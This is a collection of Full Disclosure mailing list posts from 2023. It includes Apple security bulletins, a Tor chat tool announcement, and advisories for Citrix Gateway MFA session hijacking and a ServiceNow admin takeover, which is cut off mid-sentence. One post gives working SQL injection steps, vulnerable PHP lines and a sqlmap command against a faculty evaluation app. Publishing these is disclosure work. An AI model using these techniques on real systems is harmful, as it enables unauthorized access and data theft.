[FD] [tool] tc - anonymous and cyphered chat over Tor circuits in PGP
Hello, tc is a low-tech free software to chat anonymously and cyphered over Tor circuits in PGP. Use it to protected your communication end-to-end with RSA/DSA encryption and keep yourself anonymously reachable by anyone who only know your .onion address and your public key. All this and more in 2400 lines of C code that compile and run on BSD and Linux systems with an IRC like GUI. It's a minimal, easy to customize unix tool that I write to overcome control, voyeurism and censorship avoiding platforms, logging and data retention. site: r4f5fajp2oiuhjqyass3nogu55sivxnc42fnwankiynf6o5jpno6exad.onion/tc.html mirror: https://packetstormsecurity.com/files/172562/tc-Tor-Chat-Client.html Good night and good luck, f. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Citrix Gateway & Cloud MFA - Insufficient Session Validation Vulnerability
Document Title: === Citrix Gateway&Cloud MFA - Insufficient Session Validation Vulnerability References (Source): https://www.vulnerability-lab.com/get_content.php?id=2324 Vulnerability Magazine:https://www.vulnerability-db.com/?q=articles/2023/07/03/citrix-gateway-cloud-mfa-insufficient-session-validation-vulnerability Security Video: (Cloud) https://www.youtube.com/watch?v=vObgOpGpCSM Security Video: (OnPrem) https://www.youtube.com/watch?v=RFjRgiW2OWE Release Date: = 2023-07-03 Vulnerability Laboratory ID (VL-ID): 2324 Common Vulnerability Scoring System: 5 Vulnerability Class: Insufficient Session Validation Current Estimated Price: 2.000€ - 3.000€ Product & Service Introduction: === Cloud Software Group's NetScaler and NetScaler Gateway, previously better known as Citrix ADC and Citrix Gateway (and hereafter referred to as Citrix *) provides secure and reliable access to web applications, enterprise applications and corporate data. "Citrix Gateway consolidates remote access infrastructure to provide single sign-on for all apps, whether in a data center, in a cloud, or if the apps are deployed as SaaS apps. It allows users to access any app from any device through a single URL. Citrix Gateway is easy to deploy and easy to manage. The most typical deployment configuration is to place the Citrix Gateway appliance in the DMZ. You can install multiple Citrix Gateway appliances on the network for more complex deployments." (Copy of the Homepage:https://docs.citrix.com/de-de/citrix-gateway.html ) "Many companies restrict website access to valid users only, and control the level of access permitted to each user. The authentication, authorization, and auditing feature allows a site administrator to manage access controls with the NetScaler appliance instead of managing these controls separately for each application. Doing authentication on the appliance also permits sharing this information across all websites within the same domain that are protected by the appliance." (Copy of the Homepage:https://docs.netscaler.com/en-us/citrix-adc/current-release/aaa-tm.html &https://citrix.cloud.com &https://cloud.citrix.com) Abstract Advisory Information: == The vulnerability laboratory core research team discovered a web vulnerability in the official Citrix Gateway (ADC/NetScaler) 13.0 & 13.1 web-application, Cloud and AAA Feature. Affected Product(s): === Manufacturer: Citrix/Cloud Software Group Products: Citrix ADC/NetScaler 13.0 & 13.1 Citrix Gateway/Netscaler Gateway 13.0 & 13.1 Citrix Cloud Services Website Possibly also earlier versions Vulnerability Disclosure Timeline: == 2023-03-27: Researcher Notification & Coordination (Security Researcher) 2023-04-24: Vendor Notification (Security Department) 2023-04-26: Vendor Response/Feedback #1 (Security Department) 2023-04-27: Vendor Response/Feedback #2 (Security Department) 2023-05-04: Vendor Response/Feedback #2 (Security Department) 2023-**-**: Security Acknowledgements (Security Department) 2023-**-**: Vendor Fix/Patch by Check (Service Developer Team) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Exploitation Technique: === Remote Severity Level: === Medium Authentication Type: Restricted Authentication (User Privileges) User Interaction: = No User Interaction Disclosure Type: Responsible Disclosure Technical Details & Description: An insufficient session validation web vulnerability was discovered in the Citrix Gateway (ADC/NetScaler) 13.0 & 13.1 web-application, Cloud and AAA Feature. The security vulnerability allows remote attackers to bypass the mfa function by hijacking the session data of an active user (non expired session) to followup with further compromising attacks. The insufficient session validation vulnerability is located in the Citrix Gateway login without web-application firewall (waf) and the Citrix Gateway login with web-application firewall (waf). Attackers can access the applications behind the Citrix Gateway without authentication after compromising a client by extract of a specific generated access cookie.In the onprem version of Citrix ADC and Citrix Gateway it is only required to hijack the NSC_AAAC cookie for unauthorized access through the Citrix Gateway. To gain access to a AAA protected webservices it is required to hijack the NSC_TMAS cookie. The security issue is not only exploitable in the onprem version of Citrix ADC and Citrix Gateway, but as well in the Citrix Cloud Services Website. For Citrix Cloud S
[FD] SQLi - Faculty Evaluation System
# Exploit Title: Faculty Evaluation System - SQL Injection
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 1.0
# Tested on: Windows Server 2022
SQLi #1
File: edit_evaluation
Line #4
$qry = $conn->query("SELECT * FROM ratings where id =
".$_GET['id'])->fetch_array();
[...]
SQLi #2
File: view_faculty.php
Line #4
// Add "id" parameter after "view_faculty" parameter then add equals "id"
with integer
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM
faculty_list where id = ".$_GET['id'])->fetch_array();
[...]
Steps to Exploit:
1. Login to application
2. Browse to following URI "
http://host/eval/index.php?page=view_faculty&id=1";
3. Copy request to intercept proxy to file
4. Exploit using SQLMap
sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint
[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.6.49
fork fingerprint: MariaDB
[...]
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2023-06-21-1 Safari 16.5.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2023-06-21-1 Safari 16.5.1 Safari 16.5.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213816. Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories. WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: A type confusion issue was addressed with improved checks. WebKit Bugzilla: 256567 CVE-2023-32439: an anonymous researcher Safari 16.5.1 may be obtained from the Mac App Store. All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmSTiBsACgkQ4RjMIDke NxmSVw//VcB/5pZJsRCeQKHJpQTzpR/XHFP0BK9iLtBGxYjY9lBMKfqsP+LjNunf qOFonh1aHjdmOuSBocG/gkjtMiBabOZL/bJjjP2xtG3O6EY9CqWJBjDBYF9xrDq6 RCyBjdCdX9sBnRk1FqFQZuiSeHGWd370cJ8fyygPHDB4BkUrhKDPXZmN4B1izpl1 iofe3J08siMBDhTW++oXopYX1LZpnMgAhZ6THnRgnBgura/fsj+gI0iWGG8fnyG0 +gJaauXP8cpzTlYpT32CekmefRIg1h0F2ZfePkqaVjJyz0ELvPFL5gUx1EMB/pIU SXnfJjpl4xholzTGo47A6xh9K62iEThzF4s3kB59aNL45OEid6X78xTgDQNqSPKO izAod5s68eaOmDoIHDYM6OqPrtWtx4b265X1dp2ywoX65Kn6iiEsTQ2nqcbXbeEl n4yjxaIH4RsjjJHPPJkjD4YpPbnloE8V/uDpZKuJib6Af0oPeR9la/McPO9Y1zR7 OuQEWqXBwPeQJlghoj4hKvR/8ea37x2etRaLQGVbWyC85PoOtuD4k39O8emV1UbP Odeoffo8GeFuI37MLF1biRuWUuXXAM8lJU6jqurCxWzT7OqjQ9Fpiw90GLpiQXKT UY/xI7iGH4Rb11U+aDS0Or86AfERg/uH76jH31bVBtzZQDfEDZo= =FbRw -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2023-06-21-2 iOS 16.5.1 and iPadOS 16.5.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2023-06-21-2 iOS 16.5.1 and iPadOS 16.5.1 iOS 16.5.1 and iPadOS 16.5.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213814. Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories. Kernel Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7. Description: An integer overflow was addressed with improved input validation. CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky WebKit Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: A type confusion issue was addressed with improved checks. WebKit Bugzilla: 256567 CVE-2023-32439: an anonymous researcher This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 16.5.1 and iPadOS 16.5.1". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmSTiBwACgkQ4RjMIDke NxkIvQ//Vg+VcycQIacREgZJ3fliWgiuZvyFhONRArVCcndkTc3m9TO6WEiuKH8B WtVcTosedVgXBSMId94Q7MWxoZtuGSNeaqov2VtUPx9wGCE5pbh4m8wOMfsR8sVL TNz7V08rtfOr07j7GQLrIpi6/lBx33ewtvhi04aNX9tX1cG8AlbvYOFicBKhv7wq NibpBicA0u46bF6OfZEUU9Aw+FSXHCKP4x0mBPu6JkwvI9TfELLzNBtdVeONyQ9v XZIeQOXrpXz5z+C4+FiR7NubIzHGs/jnpGH6YIZQwfY4xJarkJzTu1tHqlUlKbDf 4TM2cuj4SMbit6NHREBlMTcuAs6DM/zl9w5pWrrdGbzq/WhHAgyLYXJtXA3ClLJn obsWdmLj6ciz2Clsl3sXRx+rjE6TmAYHd0kJwYacwqc/fQ+EeWq2D/89vALE+c2O /kcvADzsFjkCGBJZZnviwfklDrQpKbFIGBVUgY/HNFpzQx5t2x/mBB0bmpUOnQT1 qoRmAlIWbG4NcosuMV0SnmtXoyxplURTFGUd9kYCGVjXOYDE+18onTV2TuQdgeH0 4XPxXNXoE3ybxk75ZR/d2iLFAtOhh82nGaadwlQ1DeHf36tL0ipsvxh/TATjpRL8 wzED248TxKmqnxpBoP6iNXKl2aIIIEfjmo2TXVeFLyaZxvqL9Qo= =Jj1+ -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2023-06-21-3 iOS 15.7.7 and iPadOS 15.7.7
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2023-06-21-3 iOS 15.7.7 and iPadOS 15.7.7 iOS 15.7.7 and iPadOS 15.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213811. Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories. This document describes the security content of iOS 15.7.7 and iPadOS 15.7.7. Kernel Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation) Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7. Description: An integer overflow was addressed with improved input validation. CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky WebKit Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: A type confusion issue was addressed with improved checks. WebKit Bugzilla: 256567 CVE-2023-32439: an anonymous researcher WebKit Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation) Impact: Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7. Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 251890 CVE-2023-32435: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmSTiBwACgkQ4RjMIDke NxnL+Q/7BwLlqlNVZsMfoYyaL9BWDcvAjV39orymca2/TQinwPatxs7COj0fPhHD uvrg2BcCjtqiN6F/ZLb8ROk9eWAH/gkB/LZvNUc/9sop2t33QDRCzqTREGISeeLd ZVzKrw5DUk6e1H10znoG7SrqaS9QRwOgnebwUxh8HNyx6kZh2UgVWhEc4I0NiIvH dSOdx2LjoDwhZURRvVIuaRRBOvkdhksBi7h2iThKltPA7LYDyZ2f/FBHNGw5XNC7 CuQ6/5KihsFFDLYSuxz2i7Ce2AenKO5ZyPDaRoFjJvJL7Dyy3ekcebpmw8n4rfRA SD/njVImHH+sfypfMX0HZLaoYSyQHiYljPsAdA2cmtSSgRZIX93ZXxrAqXrvPb+W btw4Vhm1+Ucgzd5wwCyrNB/k/js4dqBD75vb3MA21oxWdzGmjY8qQOoonXS3giLo ySY+061G8KaBGt0n+DKe3sLDRMvyKAciyNbFsR8vsS46fk3xGkc24kUONYQTvWSa RzcRZaT5HlQP4y93nw2b5u7tRkk89Dob+wQzgVzXHCCgzHnMPgh0ZtzS2GXqZABq NcUbFvl/nTdsKTm4C3x96xVHOiPMmPbsYa577RXdEp9cgw2KRQv9zqn1kmhfW06G JZEmjZkdUzFIwzR2wnWWQqIoIhVHGPAlIsfHI60jWlRAUaPXMlI= =6dc9 -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2023-06-21-4 macOS Ventura 13.4.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2023-06-21-4 macOS Ventura 13.4.1 macOS Ventura 13.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213813. Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories. Kernel Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7. Description: An integer overflow was addressed with improved input validation. CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky WebKit Available for: macOS Ventura Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: A type confusion issue was addressed with improved checks. WebKit Bugzilla: 256567 CVE-2023-32439: an anonymous researcher macOS Ventura 13.4.1 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmSTiB0ACgkQ4RjMIDke NxnB2Q//cudXSo4nxfW+J9ReMhN1AJNcHzmEOMDueYV8ScAa/EcuJy5Lf+Why/hP NhKVGEnbdPRafWqePPHKdRG4fFU+oH8HVTOcenKHug1sAiDgJBJGGkVlqIYywjy7 8rRXRAgUvQmyj011cbExhVbnl3GUtJGrtX6IIdCh6Ow5vH8S/zX52eiOTzCYeRIA OZJdV+fIVDMhYY9H6kzi1Yjiek5rbwTeIF82Mgiv3UB0+XPPSS0ZFflDgTDR5/gM z8Bc5VlKviL+bTlBSHcW9sjENWEeFcz8WCo8pY5ISZWbSOrclmFcDj3KYU7g/6RV DM+3qzT4vXmVy68nyfiqbBky0b7IVovDpdWuFVn9QvhuzTxHCUnpl9FgbwI+1ONu 3UandNz4wmFRcYaXblkQ4pLlWXBrHjsJ/ttOVOIX7l6aex9fuphQredSB6HTQk3M dDWlEYWbeb1SKU0ul+lBNE+Uro81Xu0kwz0hppOxEsbgSac/gS/GvQ2hk6Jryq+g j99v/f5p8vyYIRvw34QkqsG5gAL2/7uvL54OG1auRvloB+7uykfNrZZtYIBFFytx 5erI2p3iuV0fSDrPAB4ufvd/a9aFBmYNwrfzcxnIx0ffHOqAkCYTSlVhW9l4HTzW Q5SwkwSAjfs7I96Vd0lm0VV/m5Oa59J6vo+AJhDnmpYbdq5gYys= =oPRZ -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2023-06-21-5 macOS Monterey 12.6.7
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2023-06-21-5 macOS Monterey 12.6.7 macOS Monterey 12.6.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213810. Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories. Kernel Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7. Description: An integer overflow was addressed with improved input validation. CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky macOS Monterey 12.6.7 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmSTiB4ACgkQ4RjMIDke Nxn2axAAzOpbB0t+ol3rDphgU0E8AN78GcpUx2gr3nJ5K8fBE5LkJu2xZ4cp+fRV VtSp69q6aBj8RpdUWyBcSpNJ6mE6AzoI63bBzocr7QNTVcGSMwOo5KggYlQ1XmYd lM7wDcvyXZ2fHMff7fEDdtm1AVjKlmgWfgtL93FqrMl+AkHX8lzVSc8hSR7xYNx3 o41ZHQeb34HK75LBuaURD9fmz0HH/IwFWjthUCI2Ut5sTiTIRaSjm0mCIN7OsUVj F4BarWe05pfQ5Fb8kCnDT+drqzc/mnsGwWuct8mDAxXZipmzRGno734aomNplA2A mxEWC/vO1F0NSwgITpECLIEOfbzAcGFxuub/ck9NebInsu9SzNcYVU8jNfCZdwQT tU+/dSNji+U+SVrLrJxnHor/DQupPzwsUsBIGQiU3C+a+UDSSCURVolF2l/zlSW3 xsjvZz263oZrC9bAVbowYALKeM9taVkcKYnnKPWPOxEZ1VPCce6U0ccziYi2x8A1 Akb9TQekm4wCerM0QSoD9wQ0iXeeKNLD5kdss6msLKJm7Xlzm3jAoEkwmYxJ4diY 91BrdNvh7VHLSrHNwcKW2WfmUa8zntVLB4aq6w5V8dH09jL3kL7LCSGfqanpETtX phqC3eYvLM9OzM8my7RWvE/ITaMD5117XpTEWqwZ4SqrGyA2Znw= =j35K -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2023-06-21-6 macOS Big Sur 11.7.8
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2023-06-21-6 macOS Big Sur 11.7.8 macOS Big Sur 11.7.8 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213809. Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories. Kernel Available for: macOS Big Sur Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7. Description: An integer overflow was addressed with improved input validation. CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky macOS Big Sur 11.7.8 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmSTiB8ACgkQ4RjMIDke Nxn+YBAAyWBYNInnYKkuWmNlh6+4yPDp6Y31nI/YxyYBo/9NhAcbcCrwXt3kKcBp rryIUvLp2xW7TohNV+lJVCNmhqDmTbhOCRvJIT0uNFrNjZTPr8zJ9HxMzvEPuFnD YaWxXItCZPTji+Tn2iWj7rJdF9O5Zz2WmQDdXGw/0WzcfbVyFA466T8P7FsW2bJ8 2RsTITDtBWkDZ9sr63mmupcOTXxcBvCDyMTAOfq6kw8eJLpoTQv9/PFkNkTBloid yuoC3OZjZnN9/enGqp7FeX+gdyuFVT/0vczBp6fDYU5OoHhsUs/g0fcqr5caTQ5G ezqvo7jgmanrkRKKuakmS9AQsVNBTzxtq8k1i0kCKHB4tkzATHyPUuYI6jUDcM65 amkPq3WYB/i3r3UmRll8N7jZXBvOEQHg9gqmjuOL9VKXV0AdJ9vyRCZQoC7o4Eyt C9IXU5Gn9lIEisKOXfWhNGh5RiX5ma8F/WuMeJ0Pieru/WacMkCF2DWCmp9kpn/4 VzG54jyb5pq0iH8jtwYUz345ShWCDNbLkDreDvwHBO0JrgH9ch/nRvtX/wz4ISk/ 0pwyNZSyuzfwnu8I2G9fQA11a5mD5w6mlf1wVfeHGXmug32On+Zo5ZsKRe1+zc2+ Pv7lV2ae+nJm9M0eWu7QNrwGMZH8dwHTMrKHlJnNwl+gq9Pgg04= =2xce -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2023-06-21-7 watchOS 9.5.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2023-06-21-7 watchOS 9.5.2 watchOS 9.5.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213812. Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories. Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7. Description: An integer overflow was addressed with improved input validation. CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmSTiCAACgkQ4RjMIDke NxkBrQ/9FV9sgRku20Nd3ndpy+eAYdwsHtTVd3SVvZRc8SmjH3cdCtpVyzDQkXoR q+kOxN5/frd64Z0KUenixOxSLi56jIDiQLW9rSNvTFrddrttMB/y0kumiVE8/eJs xtYpqSqyyDtfGlanE77Ek0bQVYtqWxWzfatcESOm4jlL/GtfT5KINvN1Vb3WT1tl 5Fiz3XelUFQCXyLuo7tLKn7V1Ul8arFX3sShBockqiYUkQqVND6koFob0Cd7BNvE QVVBf44nwJkHzEPgqKOxprHSZ7zn8bwOsCYpynasS1Skh+AHsn45KxZyCxWK8C49 y3nliSfkTxKTkPR096bOKBXUDFrYR/WWbPmPA3Ppz1bXSQX6OjUztyN43dfruM70 1+h9MgQnyjzCfa1psaMlf+tzb3tbpOFDBf4K3P0ZJG2rFevcqUbfHa1sZ97EWmFs EY+bSDgUV5c0eXZj3qha3fb1z7adUN5Emt8mdJWONnbbuvsIMhgzEuSf9PTG3B6N 6uHXmlyrYYb+b4ONFQTIOO461Ktzy0X5TCZH6pUSnM+7fXlv5hdd39S5dvh1zVee rkElzT7j9ugFcwv5EuMB8nFWbYuLlEmJTp5NbxU1Yq7xIyHHH1KbKjgSs+UO9lVf kKhzHJjyTYIFoS7u1F0V+P02NETXYdde7jvLDH+ZPQm7DcMzYrQ= =mxba -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2023-06-21-8 watchOS 8.8.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2023-06-21-8 watchOS 8.8.1 watchOS 8.8.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/kb/HT213808. Apple maintains a Security Updates page at https://support.apple.com/HT201222 which lists recent software updates with security advisories. Kernel Available for: Apple Watch Series 3, Series 4, Series 5, Series 6, Series 7, and SE Impact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7. Description: An integer overflow was addressed with improved input validation. CVE-2023-32434: Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmSTiCEACgkQ4RjMIDke NxlANRAA3CKg+3GhLSRfK/dPEk5fGpa3yOCFabc9kOoLP2Enlou0hgawDUJxv7iW cIEiVBEAJzBpb8XZkeK9eQ8eumbJNkqQxLG94BGYUR/gB6PyTbwoQ3pt3c6ydM6a zLuZP0q57Q9hMhIiSjjVM9oqxUlr4d4poLdQQGunZEgeHC3jvAIZpXNP0+RVZkMJ VBJqjhxXuyy+A159zdwAL62YqLQqIV/Yv8dGCmu5fzc2aZJKyOyOBWyZbvKJlcze +n2SepBt6kuNxkqAUywjNckF0phigoHjSTW/fhcA2J2M7KsTvs3eAcirwMuh5TQ8 XVXTqFX7chGhxffA8TxSC/ZkNdTyO9awKCDfFe7Zr6jahvaHbWdgqh0iHHoE0EAc +IR/CAwJDh5nkO4DlDRkEMF+XfHtxqN04M0mqPZZOm02zKwh+eBqtD6FqA27K0+S k3n7VQ29UlEQj759qDP2R3p2zNOpRmhedp4q1b6ttDpZmZoW8+qyeFFOpXaqOUnj M/pZEAt69CUtqmbmilZh+OWIdbYZAHtZS0bZ/2oOSle8jj3uqpjtS4eUmVuflGYj 3e2c65yQarbEVrOnl65W3cH52FbIbUl3nPQUItLgk+eo/s3Z5wxXBnvfOmaaxbnO g4l+riJ5xuZ/KFtcaS2rNE7OrkrRjv7ctV1n8TwwtqkypUMjsGw= =P+K6 -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] ServiceNow Account Takeover to Full Admin Compromise
1. INFORMATION -- [+] CVE: CVE-2022-43684 [+] Title : Insecure Access Control To Full Admin Compromise [+] Vendor : ServiceNow [+] Publication date : June 2023 [+] Credits: Luke Symons, Tony Wu, Eldar Marcussen, Gareth Phillips, Jeff Thomas, Nadeem Salim, and Stephen Bradshaw. 2. AFFECTED VERSIONS * Quebec prior to Patch 10 Hot Fix 8b * Rome prior to Patch 10 Hot Fix 1 * San Diego prior to Patch 7 * Tokyo prior to Tokyo Patch 1; and * Utah prior to Utah General Availability 3. DETAILS -- ServiceNow is a cloud-based platform that provides service management software as a service (SaaS). It is used by a millions of companies worldwide, and specializes in IT Service Management (ITSM), IT Operations Management (ITOM), and IT Business Management (ITBM). It allows users to manage incidents, service requests, problems, and changes within the IT infrastructure of a business. It also provides a self-service portal where end users can request IT services and log issues. During a security audit it was identified that a threat actor could exploit a access control issue and a number of other vulnerabilities and chain them together in a ServiceNow instance leading to an effective account takeover to obtain administrative access on the platform as a low privileged user. An XHR request to xmlhttp.do with the "ChartDataProcessor" processor in the POST request allows the 